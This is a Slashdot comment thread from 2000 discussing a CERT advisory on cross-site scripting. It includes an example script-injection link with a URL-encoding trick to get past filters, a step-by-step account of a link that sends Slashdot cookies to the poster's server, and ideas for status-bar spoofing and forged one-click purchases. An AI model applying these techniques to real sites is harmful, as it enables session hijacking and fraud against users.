    The Scenario: I, malicious content poster and author of evil pseudoscientology books, post a perfectly normal looking URL that actually links to the URL for the one-click 'buy this' stuff.

    You, innocent reader and user of Amazon's one-click shopping, decide to follow my link. Next thing you know, you've purchased my book and I get royalties. You already had the Amazon cookie on your machine because of pash purchases. I wasn't trying to get you to pay for something that ended up in my hands, I was merely trying to get you to PAY for something.

    I'm not an Amazon frequenter, so I don't know what the URLs look like or if this is even possible.. I'm just clarifying the original poster's suggestion.
  • by schon ( 31600 ) on Wednesday February 02, 2000 @02:05PM (#1310814)
    Basically, all clients and all Web servers are affected by this problem

    Well, in a word, no.

    Apache, MS, and Sun's server products are affected by this, but that's hardly every web server.

    Roxen [roxen.com] is not affected, as by default it dequotes all input sent by a client. If explicitly requested, the web page author can get the raw data, but by default, the designer doesn't have to worry about it. (This is one of my favourite features of Roxen :o)

    Co-incidentally (or perhaps not), Roxen is the web server used by Securityfocus.com (the administrators of BugTraq)
  • by bridgette ( 35800 ) on Wednesday February 02, 2000 @12:13PM (#1310815)
    Websites that are totally unusable without scripting will begin to feel some pressure to clean up their acts.

    Obviously most "major" sites don't give a rat's ass if they piss off or exclude a few geeks who get all 'paranoied' about security - or worse yet, run some non Win OS or some non IE/NS browser. (OT: don't get me started on the ones that require flash)

    We can only hope that if 'joe average' starts disabiling scripting and complaing about all the sites that no longer work, maybe, just maybe, the web will become a bit more 'geek-friendly'

    EOR
  • by fegu ( 66137 ) <Finn@ G u n d e rsen.net> on Wednesday February 02, 2000 @11:35AM (#1310816) Homepage
    Siemens has developed a free-for-non-commercial-use small webproxy designed to be installed on either a client machine or server (Win98/NT/2K only mind you). It has lots of configurable options including eliminating popups and graphics of user-definable sizes (provided the IMG links contain HEIGHT and WIDTH attributes the proxy doesn't even load them). I have used it for a year now and I am very happy with it. Speeds up the browsing and reduces visual noise.

    Go to http://www.webwasher.de (English site). A separate company called Webwasher.com AG now promotes it, but it was originally designed by Siemens.
  • by zantispam ( 78764 ) on Wednesday February 02, 2000 @11:43AM (#1310817)
    Actually, this one would probably screw you worse...

    Yes kids, it is malicious...

    (Actually, I could make it worse still if I could figure out a way to make /. recognize onMouseOver and onMouseOut. Put a killer javascript link in, onMouseOver="window.status='http://friendlyplace.c om'; return true" onMouseOut="window.status='Document: Done'; return true". That would be killer...)

    Here's my [redrival.com] copy of DeCSS. Where's yours?
  • by Cyberllama ( 113628 ) on Wednesday February 02, 2000 @10:36AM (#1310818)

    I don't think any experienced users will have any problems with this. Anything you put in the comments will show up when the mouse cursor is over the document (well, not in lynx, but you get the idea) so you see the link location, in this case you'll see code. It's also interesting to note that IE has the additional insecurity that you can actually EMBED HTML CODE DIRECTLY INTO THE HYPERTEXT LINK ITSELF using "about:". For some strange reason, if you click on an like that starts with "about:", instaed of an actual website, IE will echo all that information back as if it were a webpage (including parsing of any HTML). An example? IE users paste (slashdot won't let me actually post it as a hyperlink, which is good) this url in their browser "about://(html)(head)(title)hi(/title)(/head)(p)Hi all you crazy IE users(/p)(/html) and replacing all the ('s and )'s with greater than and less than signs.

    NOTE: I'm pretty sure it was about: that caused this unusual effect(it might have been something else, I don't have IE handy to test with). If it's something else, someone else can respond and correct me. (its been over a year since I discovered this, I sent it bugtraq, but it was never posted and according to the moderator this was a well-known thing, which I'm sure it is)

  • by dbm00 ( 117570 ) on Wednesday February 02, 2000 @10:15AM (#1310819) Homepage
    Frankly, I think this kind of notice is totally
    irresponsible on the part of CERT. This is exactly the kind of news that the media loves to latch onto and turn into all kinds of sensational press. CERT actually recommends in their notice that users disable all scripting in their browsers! There may well be a security issue here, but that does not justify risking a major consumer panic... Scripting is a key feature of almost every interesting site these days-- even the one's that don't do a ton of stuff on the client side have nice "mouseovers" to allow friendly messages for the user at the bottom of the screen.

    Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely. They should have cooperated with other authorities on the web to publish this information in a more sensible manner. Doing things this way just draws attention to a problem that can be solved inside of the engineering circle and without bugging the consumer.

    Just my two cents...
  • by dbm00 ( 117570 ) on Wednesday February 02, 2000 @10:42AM (#1310820) Homepage
    The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.

    And that is really the key. Not only can we not depend on them to disable scripting and cookies, we SHOULD NOT depend on them to do so... It makes all the "good guys" lives that much more difficult when they can't take advantage of the neat technologies available to users just because there are those out there abusing them.

    IMHO, most of this problem could be solved by having smarter browsers. Granted, it is a difficult problem, but what is this about ActiveX controls allowing you to reformat a hard drive!? That is utterly ridiculous. I can't believe that any browser manufacturer would even consider allowing this kind of access to the underlying OS (and I actually _like_ IE).

    My proposal:


    1) Make it a no-brainer for the consumer... Don't bother them at all unless there is a genuine crisis. Exploitable security holes are only genuinely a crisis if they do something worse than crash a machine-- which happens a lot anyways to those of us who aren't running "real" operating systems.

    2) Make it almost a no-brainer for the developer. I should have to think about invalid input from the user, definitely. But I shouldn't have to worry about buffer overrun errors and the like... The subsystems I develop on should be robust.

    3) Make it the browser developer's job to keep the system safe from the Web. The browser is our "window" into the web. Thus, IT should filter the nasties that might come in...
  • by Animats ( 122034 ) on Wednesday February 02, 2000 @09:23PM (#1310821) Homepage
    Check out the "digital wallet" system being promoted by ECML.org [ecml.org]. This is a system intended to make it very easy for a merchant to obtain credit card and address information from your "digital wallet". You're supposed to have to click on something, but it's not clear if that mechanism can be subverted by script-based attacks.

    On a related note, the "digital wallet" mechanism doesn't generate enough data to log the transaction properly at the consumer end. Despite the fact that XML was designed to do exactly that sort of thing, the "digital wallet" system is one-way. You don't get the equivalent of a credit card receipt in XML for your transaction. The way this ought to work is that your wallet is sent an XML invoice and if the user accepts it, a signed XML purchase order with payment info and amount being paid is returned, after which a signed XML purchase information confirmation should come back, get checked against the payment info sent, and get logged into the wallet. That would provide proper accounting controls for the consumer, like physical credit card receipts. But no, that's not how it works. It just sends your credit card info somewhere when you click.

  • by takemiya ( 139902 ) on Wednesday February 02, 2000 @11:23AM (#1310822)
    Remember, when you browse someone's site, you browse every site that person has browsed...
  • by TheGratefulNet ( 143330 ) on Wednesday February 02, 2000 @10:10AM (#1310823)
    see www.jodi.org [jodi.org] as an example of how JS can screw you over.

    for some windows users, their system may lock up very tightly. so while there's no direct harm in this, its rude as hell and is just another example of how client-side auto-executable code is a bad, bad, BAD thing.

    if you want web-based executables, they should properly execute on a server and NOT on the client.

    --

  • by I)ruid ( 147754 ) on Wednesday February 02, 2000 @12:06PM (#1310824) Homepage
    This is not a new discovery, in fact, we released an advisory about it in December of 1998. The advisory can be found here: http://www.caughq.org/files/pub/A dvisories/000005 [caughq.org]. This advisory was sent at the time of release to Yahoo, who promptly fixed their search engine, and was also sent to the BugTraq mailing list where it was promptly denied posting because "This isn't a hack." This has been around for quite a long time, I guess it just takes a CERT advisory to make people take notice.
    NOTE: This is a duplicate post, the original was posted in reply to the wrong post
  • by pridkett ( 2666 ) on Wednesday February 02, 2000 @01:03PM (#1310825) Homepage Journal

    Am I the only one who said "well, geez, that's obvious, a monkey could have figured that out". The issue is just people being smart about how they handle user provided input. We've all seen this sort of stuff for a long time, so it surprises me that CERT would issue a warning on something like this.

    Just don't be a bonehead when writing your stuff. Strip out all tags then apply them again later if needed.

    $_ =~ s/</&lt;/g;
    $_ =~ s/>/&gt;/g
    $_ =~ s/&lt;\s*\/?b\s*&gt;/<b>/gi;

    This strips out all HTML tags except for properly formatted <B> and </B> tags.

    Grow a brain. It helps.

  • by CodeShark ( 17400 ) <ellsworthpc@NOspAm.yahoo.com> on Wednesday February 02, 2000 @01:13PM (#1310826) Homepage
    I did the old "view source trick" to see what you actually did. ('Cause I really didn't want to send you my slashdot cookies.)

    I hope you don't mind my explaining what the link would do if someone actually clicked it. This is an absolutely brilliant demonstration of the security hole. The link works like this:

    1. the standard <A HREF= "" opening, followed by
    2. an http...slashdot page which I assume is bogus.
    3. Without closing the HREF, Mark then included a <script> tag, with the
    4. location set to his server's printenv as the target, and the
    5. document.cookie (for /.) as part of the contents of the http request header which this script would send.
    6. Then he closed the script tag, (</SCRIPT>) then the HREF.
    Absolutely brilliant. Like he said: DO NOT FOLLOW THIS LINK [slashdot.org]
  • by Plasmic ( 26063 ) on Wednesday February 02, 2000 @11:02AM (#1310827)
    Sun Microsystems' has posted their recommendations for Java Web Server [sun.com].

    Apache has also put up an advisory of sorts, CSS Cross Site Scripting Info [apache.org]. They make several valid points; this is my favorite:

    It is not an Apache problem. It is not a Microsoft problem. It is not a Netscape problem. In fact, it isn't even a problem that can be clearly defined to be a server problem or a client problem. It is an issue that is truly cross platform and is the result of unforeseen and unexpected interactions between various components of a set of interconnected complex systems.
    CERT has a collection of helpful stuff up about Understanding Malicious Content Mitigation for Web Developers [cert.org].

    (Disclaimer: This post is guaranteed to be free of malicious HTML tags embedded in client web requests by the author)
  • by Genaro ( 30541 ) on Wednesday February 02, 2000 @10:42AM (#1310828)
    Quite on the contrary!

    This has been an issue for a long time. If at the time of reading this issue is still unsolved it only means that the industry will not solve it by itself.

    Users should demand better security. The only way they can do it is being informed of the risks involved.

    We have seen soooo many sites depending on this features for no reason at all for sooooo much time.

    I think it is needed more pressure.
  • by devphil ( 51341 ) on Wednesday February 02, 2000 @11:06AM (#1310829) Homepage
    Eli the Bearded posted a perl script to alt.hackers recently that edits the Netscape binary and disables certain Javascript "features".

    If you don't read alt.hackers or have no idea what a really cool hack that is, then fire up whatever browser the Linux Lemmings are using this week and go to DejaNews. (I don't recall whether his article has an X-No-Archive header in it or not, YMMV.)

  • by gnarphlager ( 62988 ) on Wednesday February 02, 2000 @10:19AM (#1310830) Homepage
    DAMNIT. Netscape caught me out with that Opera floozy again. Let alone Mozilla . . . that's like doinking your partner's sibling!!!! And who KNOWS what sort of disease I'll pick up with IE . . . . .
  • by DeadSea ( 69598 ) on Wednesday February 02, 2000 @10:40AM (#1310831) Homepage Journal
    I really doubt that slashdot is immune to this.
    The article brings up the point that malicious scripts can be submitted in links like this one. When you click on them you execute malicious code.

    <A href="http://example.com/comment.cgi?mycomment= <SCRIPT>malicious code</SCRIPT>"> Click Here</A>

    Slashdot wouldn't allow this (i assume) because it would see the script tag and not allow it.

    It would be very easy to fool slashdot in this instance. (I haven't tried it, so correct me if I am wrong.) When URLs are submitted to a server, they are often URL encoded. That is characters are replaced by their respective ascii values. You probably have seen a %20 in place of a space many times, its one of the most common, but it can be done with any character. The first thing that a server usually does when it gets a page request is to URL unencode the URL.

    So now imagine that I create the link:

    <A href="http://example.com/comment.cgi?mycomment= %60%83%67%82%73%80%84%62malicious code%60%47%83%67%82%73%80%84%62"> Click Here</A>

    Now Slashdot doesn't find script tags, but the server that gets the URL still does.

  • by autechre ( 121980 ) on Wednesday February 02, 2000 @10:18AM (#1310832) Homepage
    On the browser end? Yes, there have been ActiveX exploits that are quite bad,
    including one which allowed--you guessed it--formatting of your hard drive.
    ActiveX was going at a rate of 1 exploit per week for a while, though it
    does seem to have quieted down a bit.

    On the server end, it can be far more serious. If you're using perl scripts,
    and your scripts accept input with any characters (ie, pathnames, executable
    code), you may quite easily be hacked. Ditto if you're using something like
    PHP and MySQL; if you accept SQL commands as valid input, you're krunked.

    I can't give concrete examples, because I don't feel skilled enough; however,
    one only needs to peruse the BUGTRAQ archives at securityfocus.com to see
    plenty of them.
  • by gwalla ( 130286 ) on Wednesday February 02, 2000 @11:33AM (#1310833) Homepage

    I added a request for this in bugzilla [mozilla.org]. It is Bug #26272 [mozilla.org]. If you have some spare browser-component votes, vote for it [mozilla.org]. If you don't have a (free) bugzilla account yet, get one [mozilla.org].


    ---
  • by Marc Slemko ( 6200 ) on Wednesday February 02, 2000 @11:44AM (#1310834)
    Do not follow this link. Warning: it will send any slashdot cookies that you have (ie. if you are logged in) to my web server, where they will be logged in the logs. The cookies will appear as the query string for printenv. No one else has access to the machine and I will not do anything with them, but can you trust me? But, if you are confident it can't be done, you have nothing to worry about. Javascript has to be enabled for this to work. Most of the people dismissing this problem don't realize the implications. (the link should come out properly, at least it previews right, but getting the right chars in there can be tricky sometimes...) DO NOT FOLLOW THIS [slashdot.org]
  • by GoRK ( 10018 ) on Wednesday February 02, 2000 @11:11AM (#1310835) Homepage Journal
    A Javascript OnMouseOver inside of an Anchor tag can change the apparent destintaion of a link by changing the text in the status window. So unless you like digging through the page's HTML and checking out the link you're clicking then this isn't really verifiably secure.

    I for one think this is a stupid feature of javascript. I want the statusbar to tell me what the link is doing. A webpage shouldn't have the ability to screw with my browser's status bar! At least this should be a javascript option -- "Restrict Statusbar control" -- as other people have pointed out -- on and off aren't enough control!

    ~GoRK
  • I think that CERT is pointing fingers at the wrong people here. Relying on the site provider to filter hostile code from messages is naive and foolish. If a website can execute hostile code, someone WILL make a website to do it anyway.
    Browsers should not execute harmful code in the first place. Any code beyond trivial JavaScript needs to be cryptographically signed and then verified before being executed. Clients should warn if the code has not been signed with the certificate of the document owner (provided through a metatag [ yes i know this doesn't verify the document owner's identity ] ) itself. Pages should have the option of passing a metatag like "DisAllowTags 'IMG FONT SCRIPT EMBED'" to keep clients from attempting to parse certain tags and possibly execute code.

    Although I have placed most of the blame on the browser, let me say that the client should not be the only line of defense. Servers that allow posting of external HTML should certainly filter images and scripted content.

    I did like CERT's points about SSL and cookie poisoning. Has anyone generated proof of concept code or heard of this being exploited?

    That's my $0.02. I'd like to hear opinions on providing
  • by SurfsUp ( 11523 ) on Wednesday February 02, 2000 @10:32AM (#1310837)
    Desperately needed JavaScript options are:
    -no pop-ups (display pop-up requests in a dedicated widget)
    -no clickless redirection (display as links in a pseudo-frame or with a dedicated widget)
    I'd like to point out once again (sorry if I sound like a broken record, but a lot of people seem to forget this) you don't have to ask for such options: you can get and hack your own private copy of Mozilla. When you've prefected the ultimate Javascript security patch, contribute it to the tree.
  • by Sloppy ( 14984 ) on Wednesday February 02, 2000 @11:03AM (#1310838) Homepage Journal

    CERT actually recommends in their notice that users disable all scripting in their browsers!

    Yeah, so? That has been good advice ever since the client-side scripting stuff started to show up.

    Scripting is a key feature of almost every interesting site these days

    Bullshit. You must be on a different web than I am, because I have never seen a web browser where Javascript was a key feature -- not counting stuff like games that are written to show off what Javascript can do. From what I've seen, the main use of Javascript is that newbie webmeisters try to use it as a replacement for links.

    even the one's that don't do a ton of stuff on the client side have nice "mouseovers" to allow friendly messages for the user at the bottom of the screen.

    This is your idea of a "key feature"?! Look, if the web needs menus, that's fine. But running scripts on the client side isn't the right way to add that feature. Anybody with half a brain could do a lot better.

    Following CERT's recommendations amounts to disabling a vast part of the web's functionality entirely.

    Bullshit.

    Doing things this way just draws attention to a problem that can be solved inside of the engineering circle and without bugging the consumer.

    The engineering circle has had years to do something about this crap. They didn't. Browser makers could have shipping their browsers with all client-side execution "features" disabled by default, all along. They didn't. They could have put up a warning popup that tries to scare the user whenever they turn on this stuff. They didn't. Who are you calling irresponsible?


    ---
  • by NMerriam ( 15122 ) <NMerriam@artboy.org> on Wednesday February 02, 2000 @10:04AM (#1310839) Homepage
    This one really took me by surprise as a web developer. I have to admit that it had never occurred to me not to trust the client in this manner (although there's nothing on any of my sites that would be capable of being abused in this way).

    But considering the number of dynamic sites that are being thrown up on a regular basis, especially with folks adding messageboards as quickly as possible in hopes of building a "community", i suspect this failure is present on a lot of large sites.

    For those who aren't reading the advisory, it essentially says that sending a malicious link (a link that puts code in the input strings) to someone could cause a server to return that malicious code, assuming that the client sent it knowingly.

    Needless to say, a lot of folks who don't pay attention to status bars and address bars could fall prey to all sorts of exploits based on this that don't require "running" anything on the client machine that a typical security app could catch. The only way we can reliably fix this hole is for all of us running servers to remove trust of clients -- we can't depend on clients to disable scripting or cookies.
  • by Webmonger ( 24302 ) on Wednesday February 02, 2000 @10:07AM (#1310840) Homepage
    Sure, you can run arbitrary Javascript if you use links. Here's a (safe) example.
  • by TheDullBlade ( 28998 ) on Wednesday February 02, 2000 @10:10AM (#1310841)
    Browsers should never have been made to have only one JavaScript option: on or off.

    You ought to be able to limit your JavaScript functionality in many different ways. I browse with JavaScript off all the time, to prevent automatic pop-ups, but I have to turn it back on because so many sites just don't work with JavaScript turned off (often for no good reason: JavaScript links instead of HTML links, for example).

    Desperately needed JavaScript options are:
    -no pop-ups (display pop-up requests in a dedicated widget)
    -no clickless redirection (display as links in a pseudo-frame or with a dedicated widget)

    With these, I could happily browse all sites with the same settings.

    I can't think of any others yet (I think they depend on the specific environment; aren't there some real security hazards?), but I'm sure there are more. What am I missing?

    (aside from JavaScript, turning off all animations is another much-needed option)
  • by IIH ( 33751 ) on Wednesday February 02, 2000 @10:11AM (#1310842)
    When "one-click" shopping from Amazon came out, I was concerned because of the security aspects, and this warning seems to cover one of the possible ways that it could be abused. AFAIK, when at amazon, if you have OneClickShopping turned on, it sends the cookie when you click on a url and you buy the product without any further confirmation.

    However, because of the non confirmation aspect, what is to stop someone sending/posting a message which includes a image link to that "buy" url? Unless Amazon have a security check to stop this, it would be the ultimite spam email - everyone who read it would buy your product!

    Can someone confirm/check if there are safeguards (eg referrers) that stop this simple abuse of OneClickShopping?

    --
  • by seligman ( 58880 ) on Wednesday February 02, 2000 @11:16AM (#1310843) Homepage
    Here's a cute example for those of you logged in right now (Not sure this will work in every browser, it should). It doesn't actually do anything, but it would be trivial to redirect you to another page, and log the information.

    Even though I kind find it useful, I think running a script like this should at least be an option in the browser.

  • by Niko. ( 89205 ) on Wednesday February 02, 2000 @10:06AM (#1310844)
    OK folks, now we really need our browsers to have heavy-duty cookie control, IP filtering, and perhaps even some Java, JS and html "smell-checking".

    I for one would like to see antibookmarks. Control-click on a banner, that server is blocked. Surf into a trap website, hit an fkey, add its domain to a killfile.

    Websurfing is supposed to be promiscuous; that's the idea, I thought. (No pr0n jokes, OK?)
  • by gfxguy ( 98788 ) on Wednesday February 02, 2000 @10:45AM (#1310845)
    I love these suggestions - along with:
    • Not allowing anything to "attach" itself to any buttons on my browser. It's MY browser, and if I want to go BACK or FORWARD then I want to go BACK or FORWARD. Who decided someone should be able to override that?

    • Ability to browser spoof - set what your browser tells sites about your system, the browser itself, etc., thereby making idiot sites that ONLY allow Netscape or ONLY allow IE useless.

    • Asking before opening a window - with the option to open the selected URL in the CURRENT window.

    • You can interactively allow cookies - why can't we interactively allow our names or other information to be sent?

    The thing is, I tried the latest Mozilla and it didn't really render properly. Are any of these privacy/security/paranoia options in there? I'll have to check it out in more detail. At least with the source one can add these in themselves.
    ----------
  • by rellort ( 146793 ) on Wednesday February 02, 2000 @10:01AM (#1310846)
    That's right, you should not engage in promiscuous browsing on sites you hardly know. If you do, you should practice safe surfing and use an HTTProphylactic.

    (Look ma! I can spell "prophylactic"! Can you believe the college man said I was dumb because I couldn't make a Lego robot?)

"No matter where you go, there you are..." -- Buckaroo Banzai

Working...